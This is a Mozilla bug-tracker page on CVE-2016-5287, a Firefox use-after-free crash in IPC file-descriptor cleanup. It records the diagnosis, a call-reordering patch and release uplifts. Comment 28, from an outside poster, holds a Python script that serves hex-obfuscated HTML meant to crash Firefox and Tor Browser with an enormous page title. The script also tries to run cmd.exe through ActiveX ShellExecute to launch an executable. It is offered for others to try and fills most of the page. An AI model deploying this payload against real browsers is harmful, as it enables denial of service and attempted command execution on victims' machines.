Bug 1309823 (CVE-2016-5287)

Crash in nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors

RESOLVED FIXED in Firefox 49

Status

()

Core
DOM: Service Workers
--
critical
RESOLVED FIXED
a year ago
7 months ago

People

(Reporter: philipp, Assigned: bkelly)

Tracking

(4 keywords)

49 Branch
mozilla52
x86
Windows
crash, regression, sec-high, testcase-wanted
Points:
---

Firefox Tracking Flags

(firefox49+ fixed, firefox-esr45 unaffected, firefox50+ fixed, firefox51 fixed, firefox52+ fixed)

Details

(crash signature)

Attachments

(2 attachments)

(Reporter)

Description

a year ago
This bug was filed from the Socorro interface and is 
report bp-6e8fc599-f021-4b0c-b5a3-cda7d2161013.
=============================================================
Crashing Thread (27)
Frame 	Module 	Signature 	Source
0 	xul.dll 	nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::SwapArrayElements<nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator>(nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>&, unsigned int, unsigned int) 	obj-firefox/dist/include/nsTArray-inl.h:346
1 	xul.dll 	nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>::SwapElements<nsTArrayInfallibleAllocator>(nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>&) 	obj-firefox/dist/include/nsTArray.h:1661
2 	xul.dll 	mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors(nsTArray<mozilla::ipc::FileDescriptor>&) 	ipc/glue/FileDescriptorSetChild.cpp:28
3 	xul.dll 	mozilla::ipc::`anonymous namespace'::CleanupIPCStream 	ipc/glue/IPCStreamUtils.cpp:183
4 	xul.dll 	mozilla::ipc::AutoIPCStream::~AutoIPCStream() 	ipc/glue/IPCStreamUtils.cpp:343
5 	xul.dll 	mozilla::UniquePtr<mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete<mozilla::ipc::AutoIPCStream> >::reset(mozilla::ipc::AutoIPCStream*) 	obj-firefox/dist/include/mozilla/UniquePtr.h:342
6 	xul.dll 	mozilla::dom::cache::AutoChildOpArgs::~AutoChildOpArgs() 	dom/cache/AutoUtils.cpp:141
7 	xul.dll 	mozilla::dom::cache::Cache::Put(mozilla::dom::RequestOrUSVString const&, mozilla::dom::Response&, mozilla::ErrorResult&) 	dom/cache/Cache.cpp:421
8 	xul.dll 	mozilla::dom::CacheBinding::put 	obj-firefox/dom/bindings/CacheBinding.cpp:873
9 	xul.dll 	mozilla::dom::CacheBinding::put_promiseWrapper 	obj-firefox/dom/bindings/CacheBinding.cpp:893

this signature is regressing in 50.0b builds and is mainly happening in the content process. in 50.0b6 they are currently accounting for 3% of all content crashes.

some correlations for the signature on 50.0b:
(100.0% in signature vs 00.23% overall) address = 0xffffffffe5e5e5e9
(81.98% in signature vs 21.36% overall) "EGL?" in app_notes = true
(81.98% in signature vs 21.96% overall) "WebGL?" in app_notes = true
(100.0% in signature vs 40.37% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ
(72.97% in signature vs 20.35% overall) "EGL+" in app_notes = true
(80.18% in signature vs 27.71% overall) dom_ipc_enabled = 1
(72.97% in signature vs 20.83% overall) "WebGL+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context?" in app_notes = true
(Reporter)

Comment 1

a year ago
the crash first started to appear on 2016-10-10 with various different beta versions though, so some external factor may play into this as well.
(Reporter)

Comment 2

a year ago
based on https://bugzilla.mozilla.org/show_bug.cgi?id=1283823#c26 it may be that the e5e5e5e part of the address is indicative of a security issue, so i'm flagging this as a precaution.
Group: core-security
Flags: needinfo?(dveditz)
Not very useful (very generic) stack, but looks like UAF and something to do with workers and maybe the SW cache.
Group: core-security → dom-core-security
Component: General → DOM: Workers
Flags: needinfo?(dveditz) → needinfo?(bkelly)
Keywords: sec-high, testcase-wanted
Maybe the URLs in the crashes will be useful if this hit different build IDs around the same time.

Lots of zalora.co.id
Component: DOM: Workers → DOM: Service Workers
(Assignee)

Comment 5

a year ago
I would have guessed this was introduced in bug 1093357, but that landed in FF49.

I think I see the problem, though:

      if (!aConsumedByIPC) {
        Unused << fdSetActor->Send__delete__(fdSetActor);
      }

      // FileDescriptorSet doesn't clear its fds in its ActorDestroy, so we
      // unconditionally forget them here.  The fds themselves are auto-closed in
      // ~FileDescriptor since they originated in this process.
      fdSetActor->ForgetFileDescriptors(fds);

We should delete the actor after telling it to forget its file descriptors.
Assignee: nobody → bkelly
Status: NEW → ASSIGNED
Flags: needinfo?(bkelly)
(Assignee)

Comment 6

a year ago
Sylvestre, if we do a point release for FF49, I'd like to have this ride-along.  I will have patches up shortly.
Flags: needinfo?(sledru)
(Assignee)

Comment 7

a year ago
Created attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

I think this is a pretty clear ordering violation.  We must call the method on the actor before starting its deletion.
Attachment #8800794 - Flags: review?(wmccloskey)
Attachment #8800794 - Flags: review?(wmccloskey) → review+
ok, we are discussing about a dot release for a js issue, redirecting to liz
Flags: needinfo?(sledru) → needinfo?(lhenry)
This bug has 49 as unaffected. So it doesn't sound like a candidate for a dot release. 

Also, this should have sec approval though before it lands if you think 51/52 are also affected.
Flags: needinfo?(lhenry)
(Assignee)

Comment 11

a year ago
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Moderately difficult.  They would have to understand the implication that Send__delete__() can immediately delete an actor and how this ipc/glue code is called.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

I don't think the commit message includes any more information then the patch.  It references "destruction", but I am moving a method that includes "delete" in its name.

Which older supported branches are affected by this flaw?

FF49+

If not all supported branches, which bug introduced the flaw?

Bug 1093357

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

This should apply cleanly.

How likely is this patch to cause regressions; how much testing does it need?

Minimal risk.  Its reordering two calls.  We've fixed similar bugs in the past with changes almost identical to this.

I've also done a try build with an obscured patch name/message:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=e9f99b26d967bfbbd91485cf503dbb78d9aaa429
Attachment #8800794 - Flags: sec-approval?
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-aurora?
(Assignee)

Comment 12

a year ago
Liz, it was marked 49 unaffected because the crashes are not showing there.  The bug that introduced the flaw did land in FF49, though.  If no other point release was happening I probably would not push for one.  But I think it would be prudent to do this as a ride-along.
Flags: needinfo?(lhenry)
(Assignee)

Comment 13

a year ago
Based on bug 1093357 I'm going to mark FF49 affected.
status-firefox49: unaffected → affected
sec-approval+ for trunk. We'll need release management approval for Aurora and Beta patches. I'd like to take it there though.
status-firefox49: affected → wontfix
status-firefox52: ? → affected
status-firefox-esr45: --- → unaffected
tracking-firefox50: --- → ?
tracking-firefox51: --- → ?
tracking-firefox52: --- → +
Flags: needinfo?(rkothari)
Attachment #8800794 - Flags: sec-approval? → sec-approval+
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

Sec-high, let's take this on release as well as other branches. I am now aiming a dot release for mid-next week.
Flags: needinfo?(lhenry)
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-release+
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-beta+
Attachment #8800794 - Flags: approval-mozilla-aurora?
Attachment #8800794 - Flags: approval-mozilla-aurora+
Thanks Liz!
Flags: needinfo?(rkothari)
went ahead and landed this on inbound to be able to uplift to release branches hopefully before the weekend in https://hg.mozilla.org/integration/mozilla-inbound/rev/e62579becf83fb7b8524bba995af9c94b20c4ec9
(Assignee)

Comment 18

a year ago
Per comment 15.

Carsten, thanks for landing!
status-firefox49: wontfix → affected
https://hg.mozilla.org/releases/mozilla-aurora/rev/7bc185ff4e8b
https://hg.mozilla.org/releases/mozilla-beta/rev/752c1320cca5
https://hg.mozilla.org/releases/mozilla-release/rev/6b065281b17b
Blocks: 1093357
status-firefox49: affected → fixed
status-firefox50: affected → fixed
status-firefox51: ? → fixed
tracking-firefox49: --- → ?
Version: 50 Branch → 49 Branch
https://hg.mozilla.org/mozilla-central/rev/e62579becf83
Status: ASSIGNED → RESOLVED
Last Resolved: a year ago
status-firefox52: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla52
Un-track for 51 as it's fixed.
tracking-firefox51: ? → ---
(Assignee)

Comment 23

a year ago
(In reply to Ritu Kothari (:ritu) from comment #22)
> Hi Ben, this is another crash signature that is trending up in Beta50.
> https://crash-stats.mozilla.org/signature/?date=%3C2016-10-
> 17T17%3A10%3A00%2B00%3A00&date=%3E%3D2016-10-
> 10T17%3A10%3A00%2B00%3A00&product=Firefox&version=50.
> 0b&signature=nsTArray_base%3CT%3E%3A%3ASwapArrayElements%3CT%3E%20%7C%20nsTAr
> ray_Impl%3CT%3E%3A%3ASwapElements%3CT%3E%20%7C%20mozilla%3A%3Aipc%3A%3AFileDe
> scriptorSetParent%3A%3AForgetFileDescriptors
> 
> Do you think this is a different problem or it should also be fixed with
> this one?

It should be fixed with the patches landed here.  What beta do we expect this fix to be included in?  I thought it would be in 50b7, but maybe I was confused.
Flags: needinfo?(bkelly)
(Assignee)

Comment 24

a year ago
Ah, I see FF50b7 was built from this push:

https://hg.mozilla.org/releases/mozilla-beta/rev/6efc0964ec62bc4abfdc4cb1dc7cc461c3238634

Which does not seem to include this bug's patch yet.  So I am hopeful both these crashes will be fixed by this patch.
(Assignee)

Comment 25

a year ago
A number of service worker related intermittents seem to have dropped off to zero over the weekend as well.  Hoping that those are all fixed by this.
tracking-firefox49: ? → +
tracking-firefox50: ? → +
Alias: CVE-2016-5287
(Assignee)

Comment 26

a year ago
FWIW there have been no reports of either crash signature since this was released.
I'm adding the second signature here then. It's strange because it stopped abruptly on 2016-10-17.
Crash Signature: [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] → [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescript&hellip;
Group: dom-core-security

Comment 28

a year ago
Created attachment 8806996 [details]
firefox.txt

#Exploit Title: Mozilla Firefox 49.0.2 Crash
#2-11-2016
#Author: sultan albalawi
#video :https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater
#it's working  with tor browser you can try
#Tested on:win7
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
host='192.168.88.254'
port=8080
i=0
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65'
ban+='\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
print "please wait ...."
htmlcrach=('''\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\x78\x28\x29\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x20\x3d\x20\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x73\x68\x65\x6c\x6c\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22\x29\x3b\x0d\x0a\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x2e\x65\x78\x65\x22\x2c\x20\x22\x63\x64\x20\x43\x3a\x20\x43\x3a\x5c\x5c\x63\x64\x20\x63\x3a\x5c\x5c\x65\x78\x74\x5f\x66\x69\x6c\x65\x20\x6d\x61\x69\x6e\x2e\x65\x78\x65\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x43\x3a\x5c\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x22\x2c\x20\x22\x6f\x70\x65\x6e\x22\x2c\x20\x31\x29\x3b\x0d\x0a\x7d\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x20\x3d\x20\x22\x22\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x20\x2b\x3d\x20\x22\x41\x22\x3b\x0d\x0a\x7d\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x66\x20\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x66\x20\x2b\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x7d\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x74\x69\x74\x6c\x65\x20\x3d\x20\x62\x75\x66\x66\x3b\x0d\x0a\x7d\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d\x0a\x3c\x2f\x61\x3e\x3c\x2f\x62\x6f\x64\x79\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e''')
while i <= 5000:
    i+=1
    ban+=htmlcrach
class Req(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type','text/html')
        self.end_headers()
        self.wfile.write(htmlcrach)
class runHTTP(HTTPServer):
    def __init__(self,host,port):
        ipadd=(host,port)
        HTTPServer.__init__(self,ipadd,Req)
def createfile():
    global filecreate
    filecreate = "test.html"
    open(filecreate, "wb").write(htmlcrach)
    print ('file done: {}').format(filecreate)
def start():
    global filecreate
    ser=runHTTP(host,port)
    print "http://{}:{}/{}".format(host,port,filecreate)
    ser.serve_forever()
createfile()
start()
Flags: needinfo?(madperson)

Comment 29

a year ago
Mozilla Firefox 49.0.1 - Denial of Service
#Date: 15 Oct 2016
https://www.exploit-db.com/exploits/40536/
(Reporter)

Updated

a year ago
Flags: needinfo?(madperson)
Please file a new bug if you think you've found something new.
Flags: needinfo?(sultanalbalawi00)

Comment 31

a year ago
(In reply to Marco Castelluccio [:marco] from comment #30)
> Please file a new bug if you think you've found something new.

I did
https://bugzilla.mozilla.org/show_bug.cgi?id=1314862

thanks
Flags: needinfo?(sultanalbalawi00)
You need to log in before you can comment on or make changes to this bug.